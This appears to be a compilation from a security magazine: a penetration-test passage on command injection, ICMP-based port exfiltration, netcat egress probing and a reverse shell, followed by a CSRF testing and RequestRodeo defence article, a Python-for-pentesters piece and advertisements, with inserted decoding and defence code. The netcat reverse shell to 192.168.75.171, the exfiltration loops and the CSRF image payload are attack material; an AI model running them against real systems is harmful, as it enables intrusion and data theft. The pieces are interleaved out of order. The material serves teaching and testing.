Listing 10 shows how to set up a netcat listener that will accept connections, so that data can be exfiltrated from the target system. Listing 11 provides the injection for the back door on the target system. The command is designed to send a connection back to the listening server over the specified port. Once the connection is established, the Bourne Again Shell (BASH) interpreter accepts commands through the listening service on the attacker's machine. Figure 10 shows the injection in action. Access to the system has been granted, as shown in Figure 11.

Listing 4. The tcpdump Command to Capture ICMP Echo Requests Into a pcap
# -vvv and -X have no effect when writing to a file with -w
sudo tcpdump -i any -s 0 -w /tmp/listening_ports.pcap 'icmp[icmptype] = icmp-echo'

Listing 5. BCLIi Command to Determine Listening Ports
# one echo per unique listening port, padded to 56 + port data bytes; awk -F: handles IPv6 sockets (:::80)
# where cut -d: -f2 would not; Linux ping refuses payloads above 65507, so ports above 65451 are skipped
netstat -lntp 2>/dev/null | awk '/LISTEN/ {print $4}' | awk -F: '{print $NF}' | sort -un | while read port ; do TOTAL=$(($port + 56)) ; if [ "$TOTAL" -le 65507 ] ; then ping -c 1 -s $TOTAL <listening server> ; fi ; done

Listing 6. Command to Read Contents of pcap and Find Listening Ports
# tcpdump prints "... ICMP echo request, id N, seq N, length L"; L - 64 (56 data + 8 header) is the port
sudo tcpdump -nr /tmp/listening_ports.pcap 2>/dev/null | sed -n 's/.*ICMP echo request.*length \([0-9]*\)$/\1/p' | while read len ; do echo $((len - 64)) ; done | sort -un > /tmp/ports.txt

Listing 7. The Command to Grab Egress Connection Messages
sudo tcpdump -i any -s 0 -w /tmp/egress_ports.pcap 'src host <target server> and dst host <listening server>'

From here multiple attack avenues can be taken to further compromise the DMZ and eventually the internal network. One of the simplest would be to set up an Internet-facing web server owned by the attacker, hosting a pre-built Linux Meterpreter payload configured with an egress port that the previous reconnaissance showed to be accessible, but different from the one the netcat shell is using. The file could be downloaded onto the compromised host with wget. Once the payload is executed on the compromised host, further attacks and pivots into the network would be greatly simplified.

Figure 8. The Injection of The Egress Connection Test

Chris Duffy

Chris Duffy is currently the Lead Penetration Tester of Knowledge Consulting Group. He has held a number of Information Technology and Security positions such as Cyber Warfare Specialist, Senior Systems Engineer, Senior Systems Administrator, Conventional Systems Maintenance Supervisor, Network Infrastructure Supervisor, Cryptographic Technician, Satellite Communication (SATCOM) Technician and SATCOM Operator. He holds three degrees: an M.Sc. in Information Security and Assurance, a B.Sc. in Computer Science, and an A.A.S. in Electronic Systems Technology. He has earned a number of certifications which include eCPPT, CEH, CNDA, CHFI, EDRP, GSEC, G2700, CWSP, CWNA, VCP, RHCT, CIW:SP, CIW:WSS, CIW:WSE, CIW:WSA, CIW:WFA, CIW:A, BAIS, Security+, Network+, A+, NSTISSI No 4011 and NSTISSI No 4012.

Figure 9. The Results of the Grepped Data

Figure 10. The Injection of The Backdoor Start-up

Figure 11. The Interaction with The Backdoored System

Listing 8. The Command Injected to Determine Which Ports Can Connect Out
# -w 3 gives up after three seconds so a filtered port does not hang the loop
for port in 139 22 25 3000 3001 3790 443 445 16352 53 5432 587 631 7337 80 8307 9000 902; do echo "Mark port $port" | nc -n -w 3 <listening server> $port ; done

Listing 9. The Command to Grep Out The Egress Connection Message
# -A prints payloads as ASCII; the file name must match the one written in Listing 7
sudo tcpdump -nr /tmp/egress_ports.pcap -A 2>/dev/null | grep -o 'Mark port [0-9]*' | sort -u

Listing 10. The Command to Start a netcat Listener on The Waiting Server
# traditional netcat syntax; OpenBSD nc takes "nc -l <port number>" instead
sudo nc -l -p <port number>

Listing 11. The Injected Command to Start a Backdoor
# -e needs a netcat build that supports it (traditional netcat, not OpenBSD nc)
nc -v 192.168.75.171 <port number> -e /bin/bash
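The decoding side of the ICMP-length channel used above, as an added example that is not part of the article: it URL-encodes an injected command (the article requires this), turns port numbers into ping payload sizes and back, and recovers from a pcap both the listening ports sent as padded echoes (Listings 5 and 6) and the "Mark port N" egress markers (Listings 8 and 9). The capture is constructed in code, and the endpoint, parameter name and listener address 192.168.75.171 are assumptions.

```python
"""Decode the ICMP padding channel: listening ports from echo lengths, egress
ports from "Mark port N" markers. Sample capture is constructed below."""
import re
import struct
from urllib.parse import quote

PING_DATA = 56                    # default ping(8) payload size
ICMP_HDR = 8                      # tcpdump's ICMP "length" = header + data
BASELINE = PING_DATA + ICMP_HDR   # 64 = an unpadded "ping -c 1"
MAX_PAYLOAD = 65507               # largest -s Linux ping accepts (65535 - 20 - 8)


def build_injection_url(base_url, param, value, command):
    """Append ';<command>' to the vulnerable parameter, URL-encoded so ';', '|',
    '$' and spaces survive the request (endpoint and parameter are hypothetical)."""
    return "%s?%s=%s" % (base_url, param, quote(value + ";" + command, safe=""))


def port_to_ping_size(port):
    """-s value that encodes a port as 56 + port, or None where ping would refuse it."""
    size = PING_DATA + port
    return size if size <= MAX_PAYLOAD else None


def length_to_port(icmp_len):
    """Invert port_to_ping_size from the ICMP length tcpdump reports (144 -> 80)."""
    return icmp_len - BASELINE


# --- minimal Ethernet/IPv4 frame builders, used only to construct the sample pcap ---
def _ipv4(proto, payload, src="192.168.75.10", dst="192.168.75.171"):
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 1, 0, 64, proto, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    return b"\x00" * 12 + b"\x08\x00" + ip + payload     # checksums left zero


def icmp_echo_frame(data_len):
    return _ipv4(1, struct.pack("!BBHHH", 8, 0, 0, 0x1234, 1) + b"\x00" * data_len)


def tcp_frame(dport, payload):
    tcp = struct.pack("!HHIIBBHHH", 40000, dport, 1, 1, 0x50, 0x18, 8192, 0, 0)
    return _ipv4(6, tcp + payload)


def pcap(frames):
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)   # linktype 1
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1700000000 + i, 0, len(f), len(f)) + f
    return out


def parse_pcap(blob):
    """Yield (kind, icmp_len, payload) per IPv4 packet in an Ethernet pcap."""
    endian = "<" if struct.unpack("<I", blob[:4])[0] == 0xA1B2C3D4 else ">"
    off = 24
    while off + 16 <= len(blob):
        incl = struct.unpack(endian + "IIII", blob[off:off + 16])[2]
        frame = blob[off + 16:off + 16 + incl]
        off += 16 + incl
        if frame[12:14] != b"\x08\x00":
            continue
        ihl = (frame[14] & 0x0F) * 4
        total = struct.unpack("!H", frame[16:18])[0]
        l4 = frame[14 + ihl:14 + total]
        if frame[23] == 1 and l4[0] == 8:          # ICMP echo request
            yield "icmp", len(l4), l4[8:]
        elif frame[23] == 6:                        # TCP: skip the header
            yield "tcp", None, l4[(l4[12] >> 4) * 4:]


def listening_ports(blob):
    """Ports exfiltrated as echo padding; the unpadded baseline (64) is ignored."""
    return sorted({length_to_port(n) for k, n, _ in parse_pcap(blob)
                   if k == "icmp" and n > BASELINE})


def egress_ports(blob):
    """Ports whose 'Mark port N' marker reached the listener over TCP."""
    found = set()
    for _, _, data in parse_pcap(blob):
        found.update(int(m) for m in re.findall(rb"Mark port (\d+)", data))
    return sorted(found)


# Constructed capture: one baseline echo, echoes padded for ports 22, 80 and 443,
# then two egress probes of which only the one to port 443 got through.
SAMPLE_PCAP = pcap([icmp_echo_frame(PING_DATA)]
                   + [icmp_echo_frame(port_to_ping_size(p)) for p in (22, 80, 443)]
                   + [tcp_frame(443, b"Mark port 443\n"), tcp_frame(80, b"")])

if __name__ == "__main__":
    print(build_injection_url("http://victim.example/view.php", "file", "report.txt",
                              "ping -c 1 -s 57 192.168.75.171"))
    print("listening:", listening_ports(SAMPLE_PCAP))   # [22, 80, 443]
    print("egress:", egress_ports(SAMPLE_PCAP))         # [443]
```

The length arithmetic is the same as in Listing 6 (port = ICMP length - 64), and the baseline of 64 means a port-1 echo is indistinguishable from the 65-byte confirmation ping of Listing 2, so start the capture of Listing 4 fresh before injecting Listing 5. A real capture written with "-i any" uses the Linux cooked link type rather than Ethernet; the frame offsets above would then need the 16-byte SLL header instead of the 14-byte Ethernet one.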


POTENTIAL ATTACKS & DEFENSE METHODS

CSRF Testing and its Protection Using RequestRodeo

Cross Site Request Forgery (CSRF) is one of the most common attacks on the Internet today. Attackers find it easy to exploit because it requires no knowledge of the victim's credentials or session cookies, only that the user is authenticated to the application. Furthermore, it is possible on every platform, and it does not matter which type of authentication the application uses.

CSRF: Cross Site Request Forgery is an attack that enables the adversary to execute malicious requests from a different domain, or from the same domain in the case of stored CSRF, in order to perform unwanted actions without the user's knowledge. The forged request automatically includes authentication data such as session information or HTTP authentication credentials. Mounting it requires prior access to, and knowledge of, the vulnerable application. The purpose of a CSRF attack is to exploit implicit authentication: if our session is active and we open a forged link that contains a malicious request, the browser automatically attaches our authentication data or session information, and the HTTP request is accepted as valid because of implicit authentication.
Implicit authentication can be done in four ways:

HTTP Authentication

There are three types of HTTP authentication: NTLM, Basic and Digest. Once the browser holds the credentials, it resends them with every request to that site.

Client Side SSL

X.509 certificates and digital signatures are used for authentication.

Cookies

The server sets a cookie in the client web browser (seen in the response header as the "Set-Cookie" field). After that the cookie is sent with each request, and if the server finds the cookie valid it treats the request as valid and thus authenticates the user (Figure 1).

IP Based Authentication

This authentication is generally used on intranet infrastructure. Authentication is done with only the IP or MAC address, without entering a username and password (Figure 2).

Figure 1. Cookie Based Authentication

Types of CSRF

There are two types of CSRF attack: reflected CSRF and stored CSRF.
In a reflected CSRF attack, the attacker uses a system outside the application to host the exploit and delivers the exploit link to the victim.
In a stored CSRF attack, the attacker uses the vulnerable application itself to deliver the exploit link to the victim and trigger the desired action.

Login CSRF

Sometimes the attacker creates a forged login request using his own username and password. The main purpose of this is to learn about the victim's interests and activities, which helps the attacker in further attacks. An attacker can, for example, view the victim's search history by logging the victim in as the attacker: the victim visits the attacker's site, where a malicious Google login link is stored, is silently logged into Google as the attacker, and from then on all of the victim's web searches are stored in the attacker's search history.

Example

There is a website xyz.com that allows registered users to post HTML messages as global messages (like scraps in orkut). The site does not sanitize the posted messages, so it is vulnerable to stored CSRF. If an attacker posts a malicious link, every user who views it has the forged request fired from their own browser. A simple illustration is an attacker who creates a logout link and posts it in a scrap: every user who views that scrap is logged out, because the zero-size image below makes the browser request the logout page without any click.
<IMG SRC="http://xyz.com/globalzone/logout/logout.php" width="0" height="0"/>

Figure 2. IP Based Authentication

How to Test CSRF in an Application (Practical Scenario)

Step 1

Let's assume there is a web application with a feature "add clients". We log in and search for a client; see the bracket on the left side of Figure 3.

Step 2

The user creates a client and captures the request in an intercepting proxy such as Burp Suite (Figure 4).

Step 3

Create an HTML page that replays this request (Figure 5).
Note: It may be difficult for newcomers to create an HTML page from the captured request. They can use the tool "Pinata" to generate the HTML page automatically.

Figure 3. Add Client feature of an anonymous application

Figure 4. Request is captured in burp proxy

Figure 5. HTML page of the captured request

Step 4

Now log in again to the application and open the crafted HTML file in a new tab of the same browser in which the user is logged in (Figure 6).

Step 5

Click the submit button and check whether the client has been added. If it was, the website is vulnerable to CSRF (Figure 7).

How CSRF Attack Works

An attacker creates a special page and tricks the user into visiting it while the user is logged in to the application. This page triggers a request to the application that carries the user's session information. Here the request is the one that adds a client; it is forged to look like a valid request for this operation, and all the details required for the operation to succeed are present as query-string or POST variables. When the request is sent from the victim's machine, the valid cookies with the session information are sent along with it.
The application mistakes the request for a legitimate one because it contains the cookies, so the operation succeeds without the user's knowledge.
The special page is easy to create. It might be a simple HTML page with an <img src="..."> tag whose source points to the page that performs the operation; for a POST request it is an auto-submitting form instead.
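The attack just described, and the defence that stops it, as an added example that is not part of the article: the "add client" action first as a handler that trusts the session cookie alone (what Step 5 confirms), then protected with a per-session synchronizer token and an Origin/Referer check. Requests are plain dicts so the code runs offline; the origin https://app.example and the field names are assumptions.

```python
"""Vulnerable versus CSRF-protected handler for the 'add client' action."""
import hmac
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "https://app.example"   # assumed application origin
SESSIONS = {}        # session id -> {"user": ..., "csrf": ...}
CLIENTS = []         # the records an attacker wants to create in the victim's name


def login(user):
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


def csrf_token_for(sid):
    """Rendered into the real form as <input type="hidden" name="csrf_token" ...>;
    the attacker's page cannot read it because of the same-origin policy."""
    return SESSIONS[sid]["csrf"]


def add_client_vulnerable(req):
    """The cookie alone authorises the action, so a forged POST from another
    site succeeds exactly as in the test above."""
    sess = SESSIONS.get(req["cookies"].get("sid"))
    if sess is None:
        return 401
    CLIENTS.append((sess["user"], req["form"]["name"]))
    return 200


def origin_allowed(req):
    """Origin header, falling back to Referer. A request carrying neither is
    refused (fail closed); that can break clients behind Referer-stripping
    proxies, which is the usual trade-off of this check."""
    hdr = req["headers"].get("Origin") or req["headers"].get("Referer")
    if not hdr:
        return False
    u = urlsplit(hdr)
    return "%s://%s" % (u.scheme, u.netloc) == SITE_ORIGIN


def add_client_protected(req):
    sess = SESSIONS.get(req["cookies"].get("sid"))
    if sess is None:
        return 401
    if not origin_allowed(req):
        return 403
    token = req["form"].get("csrf_token", "")
    if not hmac.compare_digest(token, sess["csrf"]):   # constant-time comparison
        return 403
    CLIENTS.append((sess["user"], req["form"]["name"]))
    return 200


def forged_request(sid, name, origin="https://evil.example"):
    """What the attacker's auto-submitting page produces in the victim's browser:
    the victim's cookie is attached automatically, the token is not."""
    return {"cookies": {"sid": sid}, "headers": {"Origin": origin},
            "form": {"name": name}}


def legitimate_request(sid, name):
    return {"cookies": {"sid": sid}, "headers": {"Origin": SITE_ORIGIN},
            "form": {"name": name, "csrf_token": csrf_token_for(sid)}}


def demo():
    """Status codes of four attempts, and the clients that actually got created."""
    CLIENTS.clear()
    sid = login("alice")
    codes = (add_client_vulnerable(forged_request(sid, "TESTAAAAAAAA")),
             add_client_protected(forged_request(sid, "TESTAAAAAAAA")),
             # stored CSRF: the forged request is same-origin, so only the token stops it
             add_client_protected(forged_request(sid, "TESTBBBB", origin=SITE_ORIGIN)),
             add_client_protected(legitimate_request(sid, "ACME")))
    return codes, list(CLIENTS)


if __name__ == "__main__":
    print(demo())   # ((200, 403, 403, 200), [('alice', 'TESTAAAAAAAA'), ('alice', 'ACME')])
```

The third attempt is the stored CSRF case from the xyz.com example: the forged request comes from the application's own origin, so the Origin check passes and the secret token is what denies it. The token is compared with hmac.compare_digest rather than "==" so that timing does not leak it.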

Figure 6. Submit button found after opening HTML page

Figure 7. It confirms that the Client “TESTAAAAAAAA “has
been added successfully

CSRF Protection

A few defences are available for protecting against CSRF. They are categorized from the developer's and the end user's perspective:

General CSRF Mitigation for Users
• Log off when you have finished using the application
• Don't store usernames and passwords in the browser
• Clear all cookies after finishing important work/transactions
• Use browser add-ons like NoScript for Mozilla Firefox
• Use multiple browsers, i.e. one for accessing sensitive sites and one for other activities

General CSRF Mitigation for Developers
• Session time-out
• Confirmation pages like "Are you sure you want to transfer $500 to user XYZ?"
• CAPTCHA implementation
• Check the Referer header
• Check the Origin header
• URL rewriting
• Re-authentication for sensitive actions
• View State for ASP.NET
• Double submit cookies

Other CSRF Defences
• Secret validation token
• Referer validation
• Custom HTTP header

These defences cannot see the automatic inclusion of authentication data in the HTTP request. To prevent that automatic inclusion one can use a proxy. The only problem with this solution is that it cannot prevent attacks that exploit client-side SSL authentication. In this concept the proxy sits between browser and server, so it can examine each request and response before forwarding it to the server or the client, and it can also modify requests and responses automatically. The proxy therefore helps with:
• Identification of malicious requests
• Removal of automatically included authentication data from a request
• Protection against image-based CSRF attacks, by examining the response and blocking the static image URL if it is found suspicious, or otherwise forwarding it to the client without modification, since most web browsers do not validate image element attributes before issuing the image request

Implementation of Proxy
• In the web browser (proxy integrated directly into the browser)
• In between web browser and server
The proxy analyses data as it passes through. Implementing approach 1 is time-consuming, and it has to be integrated into each and every browser.
The second approach works for all browsers since it is not tied to any particular one. For any transaction or action the request then goes from our system to the proxy and on to the server, and the response comes back the same way. As the proxy is a separate entity, it verifies each and every request generated by the client's web browser.

Steps

Step 1

For a legitimate request four conditions should be met:
• It was submitted through an HTML form or another interaction with a web page.
• It follows the same-origin policy.
• The destination host and path match those for which credentials were cached (cached credentials are what enable automatic login).
• A RequestRodeo token is present in the request.
If all of the above conditions are met, the request is treated as legitimate.

Step 2

Now only a legitimate request may carry implicit authentication. The proxy intercepts every HTTP response and searches for code that can create a request (e.g. a link, a form action or a handler such as onclick="document.location = <url>"), appends a unique token to each such URL and stores the token together with the response for later comparison. The token then arrives in the next HTTP request from the client. The proxy intercepts that request and checks the token value. If the request does not contain a token, or the token does not match one stored from a prior response, the proxy removes the authentication information from the request before forwarding it to the server.
When the server receives a request without authentication parameters it sends a 401 response to the client for re-authentication. On a 401 the browser prompts for username and password, after which it automatically resends them with every request, and the user is unaware of this. To guard against this automatic resubmission the proxy sends a 302 (temporarily moved) response with a token appended to the URL.
If the token matches, the proxy treats it as a candidate valid request and verifies the conditions above. If these are also satisfied, the request is treated as a valid request originating from the same HTML page and is forwarded to the server (Figure 8).
To remove the automatic inclusion of authentication information the server follows these steps.
• When the server finds a request suspect, it sends a 302 response and appends a RequestRodeo token to the URL.
• The client receives the URL in the redirect response and requests it.
• The server now receives an HTTP request carrying the RequestRodeo token value; this time it removes the authentication header and sends a 401 Unauthorized response asking for re-authentication.
• The client re-authenticates and sends an HTTP request with the RequestRodeo token.
• The proxy examines the request and, if it validates, forwards it to the server (Figure 8).

Figure 8. Client-Server Communication
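The core of the proxy described above, as an added example that is not RequestRodeo's own code: on the way back every URL in a response gets a token bound to the origin of the page that contained it; on the way out, implicit credentials (Cookie, Authorization) are only let through when the request carries a token the proxy issued and targets the same origin as the issuing page. Anything else is forwarded with the credentials stripped, so the server sees an unauthenticated request and answers 401 as the text describes. The parameter name rr_token and the host names are assumptions.

```python
"""RequestRodeo-style token tagging of responses and credential stripping of requests."""
import re
import secrets
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

TOKEN_PARAM = "rr_token"                # assumed parameter name
ISSUED = {}                             # token -> origin of the page it was placed in
IMPLICIT = ("Cookie", "Authorization")  # headers the browser adds on its own


def _origin(url):
    u = urlsplit(url)
    return "%s://%s" % (u.scheme, u.netloc)


def _add_token(url, token):
    parts = urlsplit(url)
    q = parse_qsl(parts.query, keep_blank_values=True) + [(TOKEN_PARAM, token)]
    return urlunsplit(parts._replace(query=urlencode(q)))


def rewrite_response(page_origin, html):
    """Tag every href/src/action URL in a response body with one fresh token and
    remember which page origin handed it out. Returns (rewritten html, token)."""
    token = secrets.token_urlsafe(16)
    ISSUED[token] = page_origin
    tagged = re.sub(r'((?:href|src|action)=")([^"]+)"',
                    lambda m: m.group(1) + _add_token(m.group(2), token) + '"', html)
    return tagged, token


def is_legitimate(req):
    """Step 1 conditions: a token is present, this proxy issued it, and the page
    that received it has the same origin as the request target."""
    u = urlsplit(req["url"])
    token = dict(parse_qsl(u.query)).get(TOKEN_PARAM)
    return token is not None and ISSUED.get(token) == _origin(req["url"])


def filter_request(req):
    """The request as forwarded to the server: unchanged if legitimate, otherwise
    with the implicit credentials removed so the forged action runs unauthenticated."""
    out = {"url": req["url"], "headers": dict(req["headers"])}
    if not is_legitimate(req):
        for h in IMPLICIT:
            out["headers"].pop(h, None)
    return out


def demo():
    """Three requests carrying the victim's cookie: a click on the bank's own tagged
    link, an untagged forged link, and a link tagged while rendering evil.example.
    Returns whether the Cookie header survived for each."""
    bank = "https://bank.example"
    page, _ = rewrite_response(bank, '<a href="%s/transfer?to=bob&amount=500">ok</a>' % bank)
    own = re.search(r'href="([^"]+)"', page).group(1)
    evil_page, _ = rewrite_response("https://evil.example",
                                    '<img src="%s/transfer?to=mallory&amount=500">' % bank)
    cross = re.search(r'src="([^"]+)"', evil_page).group(1)
    untagged = bank + "/transfer?to=mallory&amount=500"
    return tuple("Cookie" in filter_request({"url": u, "headers": {"Cookie": "sid=abc"}})["headers"]
                 for u in (own, untagged, cross))


if __name__ == "__main__":
    print(demo())   # (True, False, False)
```

The third case is why the token is bound to the issuing page's origin rather than merely checked for presence: a link tagged while evil.example was rendered is not accepted for bank.example. The limit of the approach is visible too: a stored CSRF link inside a bank.example page is tagged by that page and passes, which is the case the server-side token from the developer list has to cover.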

IP Based Authentication
IP based authentication is a technique generally used in intranet infrastructure. It uses the client's MAC or IP address as the authentication token. For the IP based authentication scheme the proxy implements a reflection server, which is used to determine whether IP based authentication is in use or not. This reflection server is always placed in front of the firewall.
Whenever the proxy finds a suspicious request it sends it to the reflection server for verification. The reflection server changes the HTTP method to HEAD, replays the request and judges it by the server's response: if the response is OK, IP based authentication is not in use. It returns this result to the proxy, which then treats the request as illegal and caches the verdict for as long as the user's IP address stays the same.
Reference
OWASP RequestRodeo Project.

Nitin Goplani

Nitin Goplani has been working with Aujas as a Security Researcher in the Telecom Security domain. With a rich background in application, mobile and network security, Nitin is now researching new and emerging threats to telecom core nodes. Apart from research, Nitin also assists in implementing security measures for fixed/mobile networks (2G/3G/LTE) and core fixed network systems that regulate access to specific network elements, for the secure operation of the core fixed network and all its variants.


Horst Görtz Institute for IT Security
Interdisciplinary Research

Network for IT Security
nrw-units strengthens companies in NRW by boosting networking along the whole value-added chain, supporting user companies and stimulating cooperation between industry and research. Another aim is to extend the leading position of companies and research institutes in Europe and to develop national and international visibility in the IT security sector. Partners in nrw-units are the Horst Görtz Institute for IT Security, eco - Association of the German Internet Industry and networker NRW e.V. nrw-units is funded by the Ministry for Economy, Energy, Industry, Medium-sized Businesses and Trade and by the European Union.
Become a units-member!

www.nrw-units.de

Open Position: Post Doc
The German Research Foundation awarded more than €4 million to
the HGI for the establishment of the interdisciplinary research training
group “New Challenges for Cryptography in Ubiquitous Computing”.
We are looking for candidates with an outstanding Ph.D. in computer science, electrical engineering, mathematics or a related areas.
Apply now!

www.ubicrypt.org

ITS.Connect 2013
We connect graduates and companies.

June 28, 2013
Bochum, Germany
Germany‘s unique IT Security Recruiting Exposition

Whether business or science, employer or graduate, here starts the way into your future. This is
where innovative minds and good graduates who make the digital world of tomorrow a little safer,
meet employers with exciting challenges.
Take part and start your future now.

www.hgi.rub.de/itsc2013
Horst Görtz Institute for IT Security | Ruhr-University Bochum | Dr. Nina Winter |
Scientific Coordinator | www.hgi.rub.de | [email protected]

POTENTIAL ATTACKS & DEFENSE METHODS

Python for Coders and Pentesters
A word that needs no introduction for InfoSec coders
The Python programming language was Guido van Rossum's gift to the Web world. Most of the time InfoSec evangelists need to write a Proof of Concept (POC), automate attacks or customize tools, and these tasks can create a lot of headaches.

The solution to these problems can be a simple .py file. An easy-to-learn syntax and a huge set of third-party libraries can solve our problems, and the best part is that Python is open source.

Target Audience

I would like to welcome all coders as well as pentesters. Welcoming coders seems obvious, but pentesters might wonder why they are welcome. This is to enable new pentesters (particularly those who are not considered coding ninjas) to learn how the various tools that already exist are implemented. The best part is that our favorite operating system (BackTrack) already comes enriched with scripts written in this language.

Scope

Most of the time when I write, read or learn any language or technology, the very first question that arises in my mind is the scope of the asset. In my experience in information security, Python is one of the best languages for automation and for creating new tools. If you are interested in working with Java, .NET, game development, web application development, socket programming, scripting, GUIs or IT security programming, Python can be the one-word answer. I would suggest visiting http://www.python.org at least once.

Hardware/Software Requirements

The interpreter has no special hardware requirements, although there are many software setups you may prefer to play with. The platform I recommend most of the time is Linux, but Windows will do as well. Linux users already have this weapon: just type python in your terminal. On Windows you will need to install it manually.

Understan­ding with a Real Case Study
Example for Coders

It would be very helpful for a coder to be able to create a powerful web spider with just a few lines of code. Most of the time, searching for online information about the client is painful, and it would help if someone automated this task for us. A few lines of PHP or Java can usually do it, but with Python it is much easier (Listing 1).
Most code lovers will notice that the task of finding links and descriptions about a web-based application is simplified by this fifteen-line script. Not only that, but SQLmap can be added: output from this script can be fed into SQLmap so that all of these links are checked for SQL injection vulnerabilities.
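A small same-host crawler that collects exactly the links worth handing to SQLmap, as an added example that is not the article's Listing 1: it keeps only URLs carrying query parameters, deduplicates them by path and parameter names, and prints them one per line for "sqlmap -m urls.txt". It uses the standard library only so it runs offline; the pages in SITE are constructed stand-ins, and live_fetch() is what a real run would pass to crawl() instead of SITE.get.

```python
"""Crawl one host, collect parameterised links, emit a sqlmap target list."""
from collections import deque
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urljoin, urlsplit


class LinkExtractor(HTMLParser):
    """Collect absolute href targets of <a> tags, resolved against the page URL."""
    def __init__(self, base):
        super().__init__()
        self.base, self.links = base, []

    def handle_starttag(self, tag, attrs):
        href = dict(attrs).get("href")
        if tag == "a" and href:
            self.links.append(urljoin(self.base, href))


def extract_links(page_url, html):
    p = LinkExtractor(page_url)
    p.feed(html)
    return p.links


def crawl(start, fetch, limit=200):
    """Breadth-first crawl that never leaves start's host. fetch(url) returns the
    HTML or None; returns {page url: [same-host links found on it]}."""
    host = urlsplit(start).netloc
    seen, queue, pages = set(), deque([start]), {}
    while queue and len(pages) < limit:
        url = queue.popleft()
        if url in seen:
            continue
        seen.add(url)
        html = fetch(url)
        if html is None:
            continue
        pages[url] = [l for l in extract_links(url, html) if urlsplit(l).netloc == host]
        queue.extend(pages[url])
    return pages


def sqlmap_targets(pages):
    """URLs with at least one query parameter, one per (path, parameter names), so
    news.php?id=1 and news.php?id=2 are tested once rather than once per record."""
    targets, seen = [], set()
    for links in pages.values():
        for url in links:
            s = urlsplit(url)
            names = tuple(sorted(k for k, _ in parse_qsl(s.query, keep_blank_values=True)))
            if names and (s.netloc, s.path, names) not in seen:
                seen.add((s.netloc, s.path, names))
                targets.append(url.split("#")[0])
    return targets


SITE = {   # constructed pages standing in for a live target
    "http://target.example/":
        '<a href="/news.php?id=1">news</a><a href="about.html">about</a>'
        '<a href="http://other.example/x.php?q=1">external</a>',
    "http://target.example/news.php?id=1":
        '<a href="news.php?id=2">next</a><a href="/search.php?q=&page=2">search</a>',
    "http://target.example/about.html": "<p>no links here</p>",
    "http://target.example/news.php?id=2": "",
    "http://target.example/search.php?q=&page=2": "",
}


def live_fetch(url):
    """Fetcher for a real engagement; pass it to crawl() in place of SITE.get."""
    import urllib.request
    try:
        with urllib.request.urlopen(url, timeout=10) as r:
            return r.read().decode(r.headers.get_content_charset() or "utf-8", "replace")
    except Exception:
        return None


if __name__ == "__main__":
    for u in sqlmap_targets(crawl("http://target.example/", SITE.get)):
        print(u)   # redirect to urls.txt, then: sqlmap -m urls.txt --batch
```

Staying on one host and collapsing id=1, id=2, ... into a single target keeps the SQLmap run inside the engagement's scope and short; the external link in the sample page is dropped by crawl() for that reason.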

Listing 1. Web-spider code
import sys
import urllib.request
from bs4 import BeautifulSoup   # pip install beautifulsoup4 lxml

def processURL(url):
    # Python 3: urllib.request.urlopen; non-2xx responses raise HTTPError
    httpResp = urllib.request.urlopen(url)
    if httpResp.status == 200:
        print(url)
        html = httpResp.read()
        bs = BeautifulSoup(html, "lxml")
        # the selectors below are tied to the layout of the page being spidered
        links = bs.find_all('div', {'class': 'three-quarter'})
        title = links[0].find_all('div', {'class': 'link'})
        title = title[0].text.strip()
        desc = links[0].find_all('a')
        desc = desc[0].text.strip()
        print('\tTitle: ' + title)
        print('\tDescription: ' + desc)
        print('\n\n')

if __name__ == '__main__':
    processURL(sys.argv[1])

Example for Pentesters

Now I would also like to discuss some examples for pentesters too. The BackTrack operating system is full of useful Python scripts that can be applied directly to our pentesting purposes.

Figure 1. TheHarvester script
Every pentest starts with one of its most useful phases, "information gathering", but most pentesters try to skip this step. I would highly recommend spending most of your time on it. Let's use Python to speed up the process. The script I'll talk about is well known as theHarvester and is available in the /pentest/enumeration/theharvester directory of BackTrack. For the purpose of this article I am using BackTrack 5, revision 2 (Figure 1).
I would appreciate it if you opened this script and gave it a try to understand it. At this point, I have run a quick example against my own website to demonstrate how easily details about any website can be gathered with this script (Figure 2). The command used is:
./theHarvester.py -d any-example-website.com -l 100 -b google

There are many useful scripts in this OS, and many more can be found with a Google search.

Path to go Further and Conclusion

All things considered, every pentester should have at least a little knowledge of this great language. The BackTrack operating system itself ships several directories of Python code, which can be drawn on for future editions. Tools like dnsrecon, goofile and metagoofil are just a few examples that can help a lot.
Apart from these built-in tools, you can import third-party libraries to perform a variety of tasks. For forensics on the Android platform please visit https://code.google.com/p/androguard/. If you write fuzzing programs you will need a Python library that can be downloaded from https://bitbucket.org/haypo/fusil/wiki/Home. This is just a start for a Python InfoSec coder; lots of DDoS attacks and wireless battles can be won with this weapon.

Hitesh Choudhary

Figure 2. TheHarvester script demonstration

Hitesh Choudhary is an ethical hacker from India, serving the Rajasthan police free of charge to handle cyber crimes and pursuing his wireless research at M.I.T., California. He has completed his RHCE, RHCSA, CEH and various other security certifications. His recent work for the code society can be seen at www.EduacationTube.net.

LET'S TALK ABOUT SECURITY

Penetration Testing a Nation
Is Australia Safe from Attack?
This article looks at some of the wider issues related to penetration
testing and security – the “A” (availability) in the CIA security
triad – and how an attack on inadequate national infrastructure
could impact a global system. It considers threats in terms of
terrorist attack and bandwidth availability, and how the national
infrastructure would respond in a crisis; using Australia as an
example.

Failure mode event analysis was used to highlight some of these issues and the author has personally visited the sites discussed. The author has recently had to do this investigation on multiple occasions with Australia hosting components of a global system, and has personally experienced many 24 hour days recovering from failures in the areas of concern; so the potential issues facing this beautiful country and its wonderful people are used as a very real and pertinent example. Hopefully, this publication will prompt action by the Australian government – and the offer of free help from the author still stands; and hopefully the good friends of the author who work in this area won't be offended.

Why Look at the National Infrastructure in
Relation to Security?

In 2011, whilst running infrastructure upgrades and disaster recovery (DR) testing in Canada for a system that is now part of the core of a well-known international money transmission company, a global system failure occurred at the same time as a planned failover to the DR infrastructure took place. Essentially, users from Australia and New Zealand were unable to access the system in Canada at all, and there were some performance issues with users in Europe accessing the system.

Initial thoughts from most support people pointed to the failover to DR being the issue, but the difference in behaviour from different regions with this global system – with users in North America experiencing no issues whatsoever – suggested a more complex issue that required understanding.
